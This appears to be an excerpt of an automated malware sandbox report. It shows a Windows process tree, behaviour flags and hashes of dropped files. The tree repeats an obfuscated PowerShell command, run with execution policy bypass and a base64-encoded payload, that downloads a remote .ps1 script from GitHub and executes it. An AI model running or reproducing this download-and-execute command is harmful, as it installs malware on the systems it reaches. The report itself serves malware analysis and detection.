C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3848
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:3116
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2920
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2824
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
20ec1ba85174b61c5e723a856f7e8bd8
SHA144482a7badbb287c14277cff87b66c2202215f6e
SHA2567c70c983cf025dd3e3c088790305f7206bd9b59c61e013213e95210e0e6e2e2e
SHA512c1fd220f50a33a92ab4f52195d6c2f027967386165ea40a023a8e940ca02e367eea2e0abc010f21857d99fcfbb7bf8d6256c4fbd0db43f32c450750c9ee7f00f
-
MD5
390f6f39ffbbd2b0190a22ede844406a
SHA135d76b22b294a7d1a0ddea4b9aa0726223cdcc53
SHA25624b0d1fb62ae2d618466cab8e792b9a46833e821fe1c952b14898cd97f58bf46
SHA51221923b424ef732cf34d62acb110334a772c8fbd949f07b47d2aa15f67fa6030aa48f92b966505c572f21726f05e7ce7a415d1e5a07fb5642e714cbc4b759ccc7
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
6938a2a0fa3adc1ab9cc3bb479ff0e74
SHA137e2117cf83cdf1a631a394ce6f0c57f70ee3f47
SHA256df16833eb7975ca070466bf2f655e078508a59968d8f50f14a8ff7873008d068
SHA5125509bae8342bfc482a671258fe3012247f89b2449e84f6c42a4dd0bc73cd4177fff6d581c3615214fc0b5f115a77e24213c5dd37f8c0631eb9064349c33eec79
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
f274ef0e5716aa2d53f81eb7c48d9a7b
SHA131e938eee074c01efb07242cdb0b0108410b5182
SHA256748e6c0be2aa4766cf3c1c10304a53c4b1a05ccbd902b954aa9223b63d1a353e
SHA512b4896a244ad4331136ce5c4cc60f898f13cccbf4ed09a1c671fa25436dd278351517438ff228066ac12993a8652fc10f75c6ba8a77aef1250c909ce90e7c34ea
-
MD5
dd4adaad350a488dbae6b396ee30e93f
SHA1049a55ee669585036180495e9995494916c43050
SHA2564d7444ef055894e5377870b46968b96d0388937262650c6eb1db6579f7a550a6
SHA512a8b7f4b4460cbb5e370f6ee8ea43c4f3dc8262cd7b2f289a9ae152d0b5ab9e5c6b2af99b8f707c2daa5499d0951072f1f0c76fd7d266b7976d5619f8e2d1020c
-
MD5
70d1bf1c7a95f0613358ac07bc3864ad
SHA152783a6ace472471ad68b602c604e48340737596
SHA25688e639c34e7798f2e51a121db7e0dedc7c5f4bfa95963bb5c93bcb221e0127c3
SHA512ed5e46ee00e735ca09c5cf4dfed311a4229ff08e9d626c1afa2ed6cc7543f8808259f9553666844ebf25d775b20af0a9bafe59c3b525a6918db1e8c7f70e4fb5
-
MD5
58b4c6a70f55d70a401015da300261b2
SHA1a13b8a1a577c3638c311f5e668b61cea8a532d35
SHA2569eaa1a087f7aaa768134c540941584fdc2cd8d050b375a36ded9d1cdf7fb7fe0
SHA5120ae4aaf9f6383b752b824f86e9ae10983e9f00df9868efa3a1c5e1f2bfae062e43458260c7a379b7d6f711f4ef6a6f22035cc4cd21d7ba1b3c7a5e10f8f06289